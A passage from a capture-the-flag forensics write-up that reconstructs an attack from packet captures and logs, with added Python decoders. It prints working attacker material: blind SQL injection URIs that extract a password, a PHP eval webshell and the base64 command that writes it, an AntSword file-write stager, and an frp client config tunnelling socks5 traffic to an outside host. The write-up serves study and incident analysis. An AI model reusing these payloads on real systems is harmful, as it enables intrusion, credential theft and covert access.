/info?l=1&o=(case_when_(select_hex(substr(password,13,1))_from_user)="31"_then_id_else_col1_end)
/info?l=1&o=(case_when_(select_hex(substr(password,14,1))_from_user)="2D"_then_id_else_col1_end)
/info?l=1&o=(case_when_(select_hex(substr(password,15,1))_from_user)="34"_then_id_else_col1_end)
/info?l=1&o=(case_when_(select_hex(substr(password,16,1))_from_user)="35"_then_id_else_col1_end)
/info?l=1&o=(case_when_(select_hex(substr(password,17,1))_from_user)="36"_then_id_else_col1_end)
/info?l=1&o=(case_when_(select_hex(substr(password,18,1))_from_user)="62"_then_id_else_col1_end)
/info?l=1&o=(case_when_(select_hex(substr(password,19,1))_from_user)="2D"_then_id_else_col1_end)
/info?l=1&o=(case_when_(select_hex(substr(password,20,1))_from_user)="38"_then_id_else_col1_end)
/info?l=1&o=(case_when_(select_hex(substr(password,21,1))_from_user)="35"_then_id_else_col1_end)
/info?l=1&o=(case_when_(select_hex(substr(password,22,1))_from_user)="64"_then_id_else_col1_end)
/info?l=1&o=(case_when_(select_hex(substr(password,23,1))_from_user)="37"_then_id_else_col1_end)
/info?l=1&o=(case_when_(select_hex(substr(password,24,1))_from_user)="2D"_then_id_else_col1_end)
/info?l=1&o=(case_when_(select_hex(substr(password,25,1))_from_user)="64"_then_id_else_col1_end)
/info?l=1&o=(case_when_(select_hex(substr(password,26,1))_from_user)="36"_then_id_else_col1_end)
/info?l=1&o=(case_when_(select_hex(substr(password,27,1))_from_user)="63"_then_id_else_col1_end)
/info?l=1&o=(case_when_(select_hex(substr(password,28,1))_from_user)="30"_then_id_else_col1_end)
/info?l=1&o=(case_when_(select_hex(substr(password,29,1))_from_user)="66"_then_id_else_col1_end)
/info?l=1&o=(case_when_(select_hex(substr(password,30,1))_from_user)="32"_then_id_else_col1_end)
/info?l=1&o=(case_when_(select_hex(substr(password,31,1))_from_user)="65"_then_id_else_col1_end)
/info?l=1&o=(case_when_(select_hex(substr(password,32,1))_from_user)="64"_then_id_else_col1_end)
/info?l=1&o=(case_when_(select_hex(substr(password,33,1))_from_user)="61"_then_id_else_col1_end)
/info?l=1&o=(case_when_(select_hex(substr(password,34,1))_from_user)="62"_then_id_else_col1_end)
/info?l=1&o=(case_when_(select_hex(substr(password,35,1))_from_user)="62"_then_id_else_col1_end)
/info?l=1&o=(case_when_(select_hex(substr(password,36,1))_from_user)="32"_then_id_else_col1_end)
Concatenated:
37 34 36 35 35 38 66 33 2D 63 38 34 31 2D 34 35 36 62 2D 38 35 64 37 2D 64 36 63 30 66 32 65 64 61 62 62 32
Hex to characters:
746558f3-c841-456b-85d7-d6c0f2edabb2
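Both the Apache-log injection in section IV (SQL injection-2/3) and the HTTP/2 hex-compare injection here are rebuilt by the same bookkeeping: group the guesses by target expression and order them by position. As an added example (not part of the writeup), this does that for both forms; it also filters out false-branch lines by response size, which the writeup did by hand (the wrong guess in SQL injection-1 returned 422 bytes, the right ones 47x). The sample lines are constructed copies of lines quoted on this page.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Apache-style line, MySQL: substr(<expr>,<pos>,1) = '<char>'
CHAR_GUESS = re.compile(r"substr\((.+?),(\d+),1\)\s*=\s*'(.)'")
# HTTP/2 URI form, hex compare: hex(substr(<col>,<pos>,1))_from_<table>)="<HH>"
HEX_GUESS = re.compile(r'hex\(substr\((\w+),(\d+),1\)\)_from_(\w+)\)="([0-9A-Fa-f]{2})"')
# Status and response size of a combined-log line.
APACHE_SIZE = re.compile(r'" (\d{3}) (\d+|-)(?:\s|$)')

# Constructed sample: four true-branch lines, one false-branch line (422 bytes,
# placed last so it would clobber position 1 if not filtered), and nine HTTP/2 requests.
SAMPLE = [
    "172.17.0.1 - - [01/Sep/2021:01:37:25 0000] \"GET /index.php?id=1 and if(substr(database(),1,1) = 's',1,(select table_name from information_schema.tables)) HTTP/1.1\" 200 472 \"-\" \"python-requests/2.26.0\"",
    "172.17.0.1 - - [01/Sep/2021:01:37:25 0000] \"GET /index.php?id=1 and if(substr(database(),2,1) = 'q',1,(select table_name from information_schema.tables)) HTTP/1.1\" 200 473 \"-\" \"python-requests/2.26.0\"",
    "172.17.0.1 - - [01/Sep/2021:01:37:25 0000] \"GET /index.php?id=1 and if(substr(database(),3,1) = 'l',1,(select table_name from information_schema.tables)) HTTP/1.1\" 200 472 \"-\" \"python-requests/2.26.0\"",
    "172.17.0.1 - - [01/Sep/2021:01:37:25 0000] \"GET /index.php?id=1 and if(substr(database(),4,1) = 'i',1,(select table_name from information_schema.tables)) HTTP/1.1\" 200 472 \"-\" \"python-requests/2.26.0\"",
    "172.17.0.1 - - [01/Sep/2021:01:37:25 +0000] \"GET /index.php?id=1%20and%20if(substr(database(),1,1)%20=%20'%C2%80',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1\" 200 422 \"-\" \"python-requests/2.26.0\"",
] + [
    f'/info?l=1&o=(case_when_(select_hex(substr(password,{i},1))_from_user)="{h}"_then_id_else_col1_end)'
    for i, h in enumerate(["37", "34", "36", "35", "35", "38", "66", "33", "2D"], start=1)
]


def rebuild(lines, true_branch=lambda size: True) -> dict:
    """Map each blind-extracted target (e.g. 'database()' or 'user.password') to the
    string recovered so far. true_branch(size) decides from the response size whether an
    Apache line was a correct guess; lines without a size (the HTTP/2 form) are always kept."""
    chars = defaultdict(dict)                       # target -> {position: char}
    for raw in lines:
        line = unquote(raw)                         # %20 -> ' ', %C2%80 -> U+0080
        m = APACHE_SIZE.search(line)
        if m and m.group(2) != "-" and not true_branch(int(m.group(2))):
            continue
        g = HEX_GUESS.search(line)
        if g:
            col, pos, table, hh = g.groups()
            chars[f"{table}.{col}"][int(pos)] = bytes.fromhex(hh).decode()
            continue
        g = CHAR_GUESS.search(line)
        if g:
            expr, pos, ch = g.groups()
            chars[expr][int(pos)] = ch
    # Join in position order; a gap in positions simply shortens the result.
    return {k: "".join(v[p] for p in sorted(v)) for k, v in chars.items()}
```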
5. IOS-5
Question: The range scanned by the hacker's port scanner is __. (format "start-end", e.g. 1-65535)
Also learned something here:
Analyze -> Expert Information:
Pick Connection reset:
The port information then shows up, from 10 to 499:
Range: 10-499
6. IOS-6
Question: The hacker accessed/attacked several internal servers; their IP addresses are __. (sort ascending, separate with #, e.g. 127.0.0.1#192.168.0.1)
First, TCP stream 271 shows the SQL injection attack against 192.168.1.12:
Then look at access.log:
It accessed http://172.28.0.2/upload.php, most likely a webshell, so the second IP is 172.28.0.2
IP addresses: 172.28.0.2#192.168.1.12
7. IOS-7
Question: The hacker wrote a webshell; its password is ( ). (letters lowercase)
Look straight at access.log:
172.28.0.3 - - [28/Aug/2021:18:45:14 +0000] "GET //ma.php?fxxk=system(base64_decode(%27d2hvYW1p%27)); HTTP/1.1" 200 38 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" "-"
Password: fxxk
VIII. Webshell
1. Webshell-1
Question: The password the hacker used to log in to the system is __
Filter directly with http contains "pass"; two packets come out, so follow the stream: tcp.stream eq 6
Password: Admin123!@#
2. Webshell-2
Question: The hacker modified a log file; its absolute path is __ (answer format /xx/xxx/xxx/xxx.log, case-insensitive)
TCP stream 33:
The file is: data/Runtime/Logs/Home/21_08_07.log
Since the question asks for the absolute path, prepend the web root: /var/www/html/data/Runtime/Logs/Home/21_08_07.log
3. Webshell-3
Question: The hacker's privilege after obtaining the webshell is:
TCP stream 28:
The attacker ran whoami and the server returned www-data
Privilege: www-data
4. Webshell-4
Question: The file name of the webshell the hacker wrote is __. (submit the file name with its extension, e.g. x.txt)
TCP stream 33:
Payload statement:
aaa=system('echo PD9waHAgZXZhbCgkX1JFUVVFU1RbYWFhXSk7Pz4=|base64 -d > /var/www/html/1.php');
base64-decoded: <?php eval($_REQUEST[aaa]);?>
So this is the webshell being written; the file name is 1.php
5. Webshell-5
Question: The name of the proxy tool client the hacker uploaded is __. (use lowercase letters) File name only, without the extension
Filter with http contains "1.php":
All of these are attacks through the webshell. Going through them one by one, TCP stream 38 stands out:
aaa=@ini_set("display_errors", "0");@set_time_limit(0);
    function asenc($out){return $out;};
    function asoutput(){$output=ob_get_contents();ob_end_clean();echo "28"."f72";echo @asenc($output);echo "f486"."11f4";}
    ob_start();
    try{
        $f=base64_decode(substr($_POST["j68071301598f"],2));
        $c=$_POST["xa5d606e67883a"];
        $c=str_replace("\r","",$c);
        $c=str_replace("\n","",$c);
        $buf="";
        for($i=0;$i<strlen($c);$i+=2)$buf.=urldecode("%".substr($c,$i,2));
        echo(@fwrite(fopen($f,"a"),$buf)?"1":"0");;
    }catch(Exception $e){echo "ERROR://".$e->getMessage();};
    asoutput();die();
&j68071301598f=FBL3Zhci93d3cvaHRtbC9mcnBjLmluaQ==
&xa5d606e67883a=5B636F6D6D6F6E5D0A7365727665725F61646472203D203139322E3136382E3233392E3132330A7365727665725F706F7274203D20373737380A746F6B656E3D586133424A66326C35656E6D4E365A3741386D760A0A5B746573745F736F636B355D0A74797065203D207463700A72656D6F74655F706F7274203D383131310A706C7567696E203D20736F636B73350A706C7567696E5F75736572203D2030484446743136634C514A0A706C7567696E5F706173737764203D204A544E32373647700A7573655F656E6372797074696F6E203D20747275650A7573655F636F6D7072657373696F6E203D20747275650A
This looks like AntSword (蚁剑) uploading a file:
L3Zhci93d3cvaHRtbC9mcnBjLmluaQ== base64-decoded -> /var/www/html/frpc.ini
That has to be frp; the uploaded file can also be exported from the capture to check:
No doubt about it: frpc
(the question asks for the client's name)
6. Webshell-6
Question: The IP of the server the hacker's proxy tool connects back to is _.
Look straight at the frpc.ini exported earlier:
[common]
server_addr = 192.168.239.123
server_port = 7778
token=Xa3BJf2l5enmN6Z7A8mv

[test_sock5]
type = tcp
remote_port =8111
plugin = socks5
plugin_user = 0HDFt16cLQJ
plugin_passwd = JTN276Gp
use_encryption = true
use_compression = true
Server IP: 192.168.239.123
7. Webshell-7
Question: The username and password of the hacker's socks5 connection are __. (separate with #, e.g. admin#passwd)
Still the frpc.ini above; the [test_sock5] section has them:
plugin_user = 0HDFt16cLQJ
plugin_passwd = JTN276Gp
Username and password: 0HDFt16cLQJ#JTN276Gp
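The three Webshell questions above (5, 6 and 7) all come out of one POST body: the stager base64-decodes the path parameter after skipping two characters and hex-decodes the content parameter before appending it to the file. As an added example (not part of the writeup), this recovers the path and the file the same way and then reads the frp client settings out of it with `configparser`; the body is constructed from the two data parameters quoted in Webshell-5, with the PHP stager parameter left out:

```python
import base64
import configparser
from urllib.parse import parse_qs

# Constructed: the two data parameters of the POST body quoted in Webshell-5.
ANTSWORD_BODY = (
    "j68071301598f=FBL3Zhci93d3cvaHRtbC9mcnBjLmluaQ=="
    "&xa5d606e67883a="
    "5B636F6D6D6F6E5D0A"
    "7365727665725F61646472203D203139322E3136382E3233392E3132330A"
    "7365727665725F706F7274203D20373737380A"
    "746F6B656E3D586133424A66326C35656E6D4E365A3741386D760A"
    "0A"
    "5B746573745F736F636B355D0A"
    "74797065203D207463700A"
    "72656D6F74655F706F7274203D383131310A"
    "706C7567696E203D20736F636B73350A"
    "706C7567696E5F75736572203D2030484446743136634C514A0A"
    "706C7567696E5F706173737764203D204A544E32373647700A"
    "7573655F656E6372797074696F6E203D20747275650A"
    "7573655F636F6D7072657373696F6E203D20747275650A"
)


def decode_file_write(body: str, path_param: str, data_param: str):
    """Return (path, content) exactly as the stager would compute them:
    path  = base64_decode(substr($_POST[path_param], 2))   -- first two chars are padding
    bytes = urldecode('%' . two hex chars) for every pair  -- i.e. plain hex decoding."""
    params = parse_qs(body, keep_blank_values=True)
    path = base64.b64decode(params[path_param][0][2:]).decode()
    hexdata = params[data_param][0].replace("\r", "").replace("\n", "")
    return path, bytes.fromhex(hexdata)


def parse_frpc_ini(content: bytes) -> dict:
    """Pull the fields the questions ask for out of an frpc.ini-style file."""
    cp = configparser.ConfigParser()
    cp.read_string(content.decode())
    proxy = next(s for s in cp.sections() if cp[s].get("plugin") == "socks5")
    return {
        "server_addr": cp["common"]["server_addr"],
        "server_port": cp["common"]["server_port"],
        "proxy_section": proxy,
        "remote_port": cp[proxy]["remote_port"],
        "plugin_user": cp[proxy]["plugin_user"],
        "plugin_passwd": cp[proxy]["plugin_passwd"],
    }


def analyse(body: str = ANTSWORD_BODY) -> dict:
    path, content = decode_file_write(body, "j68071301598f", "xa5d606e67883a")
    info = parse_frpc_ini(content)
    info["path"] = path
    info["client"] = path.rsplit("/", 1)[-1].rsplit(".", 1)[0]   # 'frpc', name without extension
    return info
```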
Originally published on the WeChat official account 南有禾木: DIDCTF-2021陇剑杯